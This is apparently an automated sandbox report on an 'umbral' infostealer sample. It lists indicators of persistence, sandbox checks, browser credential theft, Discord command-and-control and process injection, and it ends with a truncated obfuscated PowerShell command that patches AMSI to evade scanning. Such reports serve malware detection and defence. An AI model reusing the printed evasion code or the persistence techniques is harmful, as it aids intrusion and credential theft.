umbral | f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation	rootkit.exe
Key value queried	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation	www.DeadSecObbbfuscation.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	www.DeadSecObbbfuscation.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	www.DeadSecObbbfuscation.exe

Executes dropped EXE 4 IoCs

pid	Process
708	www.DeadSecObbbfuscation.exe
2964	Modify.exe
1372	www.DeadSec0000000000-obfusecator.exe
2328	XClient.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe"	rootkit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	www.DeadSecObbbfuscation.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	discord.com
21	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
18	ip-api.com

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3876 set thread context of 4012	3876	powershell.EXE	124

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
228	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
2076	wmic.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
388	schtasks.exe
404	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1484	powershell.exe
1484	powershell.exe
2864	powershell.exe
2864	powershell.exe
1120	powershell.exe
1120	powershell.exe
2960	powershell.exe
2960	powershell.exe
968	powershell.exe
968	powershell.exe
4492	powershell.exe
4492	powershell.exe
2572	powershell.exe
316	powershell.exe
2572	powershell.exe
316	powershell.exe
1332	powershell.exe
3876	powershell.EXE
1332	powershell.exe
3876	powershell.EXE
3616	powershell.exe
3616	powershell.exe
3876	powershell.EXE
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe
4012	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	708	www.DeadSecObbbfuscation.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	2964	Modify.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	316	powershell.exe
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeDebugPrivilege	3876	powershell.EXE
Token: SeIncreaseQuotaPrivilege	3632	wmic.exe
Token: SeSecurityPrivilege	3632	wmic.exe
Token: SeTakeOwnershipPrivilege	3632	wmic.exe
Token: SeLoadDriverPrivilege	3632	wmic.exe
Token: SeSystemProfilePrivilege	3632	wmic.exe
Token: SeSystemtimePrivilege	3632	wmic.exe
Token: SeProfSingleProcessPrivilege	3632	wmic.exe
Token: SeIncBasePriorityPrivilege	3632	wmic.exe
Token: SeCreatePagefilePrivilege	3632	wmic.exe
Token: SeBackupPrivilege	3632	wmic.exe
Token: SeRestorePrivilege	3632	wmic.exe
Token: SeShutdownPrivilege	3632	wmic.exe
Token: SeDebugPrivilege	3632	wmic.exe
Token: SeSystemEnvironmentPrivilege	3632	wmic.exe
Token: SeRemoteShutdownPrivilege	3632	wmic.exe
Token: SeUndockPrivilege	3632	wmic.exe
Token: SeManageVolumePrivilege	3632	wmic.exe
Token: 33	3632	wmic.exe
Token: 34	3632	wmic.exe
Token: 35	3632	wmic.exe
Token: 36	3632	wmic.exe
Token: SeIncreaseQuotaPrivilege	3632	wmic.exe
Token: SeSecurityPrivilege	3632	wmic.exe
Token: SeTakeOwnershipPrivilege	3632	wmic.exe
Token: SeLoadDriverPrivilege	3632	wmic.exe
Token: SeSystemProfilePrivilege	3632	wmic.exe
Token: SeSystemtimePrivilege	3632	wmic.exe
Token: SeProfSingleProcessPrivilege	3632	wmic.exe
Token: SeIncBasePriorityPrivilege	3632	wmic.exe
Token: SeCreatePagefilePrivilege	3632	wmic.exe
Token: SeBackupPrivilege	3632	wmic.exe
Token: SeRestorePrivilege	3632	wmic.exe
Token: SeShutdownPrivilege	3632	wmic.exe
Token: SeDebugPrivilege	3632	wmic.exe
Token: SeSystemEnvironmentPrivilege	3632	wmic.exe
Token: SeRemoteShutdownPrivilege	3632	wmic.exe
Token: SeUndockPrivilege	3632	wmic.exe
Token: SeManageVolumePrivilege	3632	wmic.exe
Token: 33	3632	wmic.exe
Token: 34	3632	wmic.exe
Token: 35	3632	wmic.exe
Token: 36	3632	wmic.exe
Token: SeIncreaseQuotaPrivilege	2328	wmic.exe
Token: SeSecurityPrivilege	2328	wmic.exe
Token: SeTakeOwnershipPrivilege	2328	wmic.exe
Token: SeLoadDriverPrivilege	2328	wmic.exe
Token: SeSystemProfilePrivilege	2328	wmic.exe
Token: SeSystemtimePrivilege	2328	wmic.exe
Token: SeProfSingleProcessPrivilege	2328	wmic.exe
Token: SeIncBasePriorityPrivilege	2328	wmic.exe
Token: SeCreatePagefilePrivilege	2328	wmic.exe
Token: SeBackupPrivilege	2328	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4952 wrote to memory of 708	4952	rootkit.exe	86
PID 4952 wrote to memory of 708	4952	rootkit.exe	86
PID 4952 wrote to memory of 2964	4952	rootkit.exe	87
PID 4952 wrote to memory of 2964	4952	rootkit.exe	87
PID 4952 wrote to memory of 1484	4952	rootkit.exe	88
PID 4952 wrote to memory of 1484	4952	rootkit.exe	88
PID 4952 wrote to memory of 404	4952	rootkit.exe	90
PID 4952 wrote to memory of 404	4952	rootkit.exe	90
PID 2964 wrote to memory of 2864	2964	Modify.exe	92
PID 2964 wrote to memory of 2864	2964	Modify.exe	92
PID 4952 wrote to memory of 1372	4952	rootkit.exe	94
PID 4952 wrote to memory of 1372	4952	rootkit.exe	94
PID 4952 wrote to memory of 1372	4952	rootkit.exe	94
PID 2964 wrote to memory of 1120	2964	Modify.exe	96
PID 2964 wrote to memory of 1120	2964	Modify.exe	96
PID 708 wrote to memory of 2960	708	www.DeadSecObbbfuscation.exe	98
PID 708 wrote to memory of 2960	708	www.DeadSecObbbfuscation.exe	98
PID 708 wrote to memory of 968	708	www.DeadSecObbbfuscation.exe	102
PID 708 wrote to memory of 968	708	www.DeadSecObbbfuscation.exe	102
PID 2964 wrote to memory of 4492	2964	Modify.exe	104
PID 2964 wrote to memory of 4492	2964	Modify.exe	104
PID 2964 wrote to memory of 2572	2964	Modify.exe	106
PID 2964 wrote to memory of 2572	2964	Modify.exe	106
PID 708 wrote to memory of 316	708	www.DeadSecObbbfuscation.exe	107
PID 708 wrote to memory of 316	708	www.DeadSecObbbfuscation.exe	107
PID 708 wrote to memory of 1332	708	www.DeadSecObbbfuscation.exe	110
PID 708 wrote to memory of 1332	708	www.DeadSecObbbfuscation.exe	110
PID 2964 wrote to memory of 3632	2964	Modify.exe	112
PID 2964 wrote to memory of 3632	2964	Modify.exe	112
PID 708 wrote to memory of 388	708	www.DeadSecObbbfuscation.exe	114
PID 708 wrote to memory of 388	708	www.DeadSecObbbfuscation.exe	114
PID 2964 wrote to memory of 2328	2964	Modify.exe	127
PID 2964 wrote to memory of 2328	2964	Modify.exe	127
PID 2964 wrote to memory of 4400	2964	Modify.exe	118
PID 2964 wrote to memory of 4400	2964	Modify.exe	118
PID 2964 wrote to memory of 3616	2964	Modify.exe	120
PID 2964 wrote to memory of 3616	2964	Modify.exe	120
PID 2964 wrote to memory of 2076	2964	Modify.exe	122
PID 2964 wrote to memory of 2076	2964	Modify.exe	122
PID 3876 wrote to memory of 4012	3876	powershell.EXE	124
PID 3876 wrote to memory of 4012	3876	powershell.EXE	124
PID 3876 wrote to memory of 4012	3876	powershell.EXE	124
PID 3876 wrote to memory of 4012	3876	powershell.EXE	124
PID 3876 wrote to memory of 4012	3876	powershell.EXE	124
PID 3876 wrote to memory of 4012	3876	powershell.EXE	124
PID 3876 wrote to memory of 4012	3876	powershell.EXE	124
PID 3876 wrote to memory of 4012	3876	powershell.EXE	124
PID 4012 wrote to memory of 612	4012	dllhost.exe	5
PID 4012 wrote to memory of 672	4012	dllhost.exe	7
PID 4012 wrote to memory of 960	4012	dllhost.exe	12
PID 4012 wrote to memory of 384	4012	dllhost.exe	13
PID 4012 wrote to memory of 744	4012	dllhost.exe	14
PID 4012 wrote to memory of 60	4012	dllhost.exe	16
PID 4012 wrote to memory of 1088	4012	dllhost.exe	17
PID 4012 wrote to memory of 1100	4012	dllhost.exe	18
PID 4012 wrote to memory of 1112	4012	dllhost.exe	19
PID 4012 wrote to memory of 1128	4012	dllhost.exe	20
PID 4012 wrote to memory of 1264	4012	dllhost.exe	21
PID 4012 wrote to memory of 1276	4012	dllhost.exe	22
PID 4012 wrote to memory of 1312	4012	dllhost.exe	23
PID 4012 wrote to memory of 1416	4012	dllhost.exe	24
PID 4012 wrote to memory of 1468	4012	dllhost.exe	25
PID 4012 wrote to memory of 1488	4012	dllhost.exe	26
PID 4012 wrote to memory of 1556	4012	dllhost.exe	27

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1dfbf6b2-19b7-432f-a32d-d00bac959d99}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:60

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1088
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kxsceEnSyUgi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oKvxycCYSSEYlj,[Parameter(Position=1)][Type]$zKpZyREXqB)$kxfeGbzgzYn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+'le'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+''+'y'+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+'pe',''+'C'+''+[Char](108)+''+[Char](97)+'s'+'s'+','+[Char](80)+''+[Char](117)+'bli'+[Char](99)+','+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$kxfeGbzgzYn.DefineConstructor('R'+'T'+''+'S'+''+'p'+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+'l'+''+[Char](78)+''+'a'+'me'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$oKvxycCYSSEYlj).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$kxfeGbzgzYn.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+','+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$zKpZyREXqB,$oKvxycCYSSEYlj).SetImplementationFlags('R'+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $kxfeGbzgzYn.CreateType();}$wvssbGJNycMKL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+'r'+'o'+''+[Char](115)+''+[Char](111)+''+'f'+'t'+'.'+''+[Char](87)+'in3'+[Char](50)+'.'+[Char](85)+'nsa'+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+'i'+'v'+''+'e'+''+[Char](77)+''+'e'+'tho'+[Char](100)+''+[Char](115)+'');$IWhPuDkvxbwrun=$wvssbGJNycMKL.GetMethod(''+[Char](71)+'e'+[Char](116)+'P'+'r'+'o'+[Char](99)+''+'A'+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SbJJAzIQkwaQSlpvFdC=kxsceEnSyUgi @([String])([IntPtr]);$OhxkqtpqEqyxdLaatNDEhj=kxsceEnSyUgi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mcJshPfBvnF=$wvssbGJNycMKL.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$kHsafMdFfldtsO=$IWhPuDkvxbwrun.Invoke($Null,@([Object]$mcJshPfBvnF,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+'ry'+[Char](65)+'')));$mcnZdhFuVGxDDxSie=$IWhPuDkvxbwrun.Invoke($Null,@([Object]$mcJshPfBvnF,[Object](''+[Char](86)+''+[Char](105)+'rtualP'+[Char](114)+''+'o'+''+'t'+''+'e'+''+[Char](99)+''+'t'+'')));$VPkiPLe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kHsafMdFfldtsO,$SbJJAzIQkwaQSlpvFdC).Invoke('am'+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$VFeHLeApsHTnxUBZm=$IWhPuDkvxbwrun.Invoke($Null,@([Object]$VPkiPLe,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+'n'+'B'+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$DXVFlYYdgW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mcnZdhFuVGxDDxSie,$OhxkqtpqEqyxdLaatNDEhj).Invoke($VFeHLeApsHTnxUBZm,[uint32]8,4,[r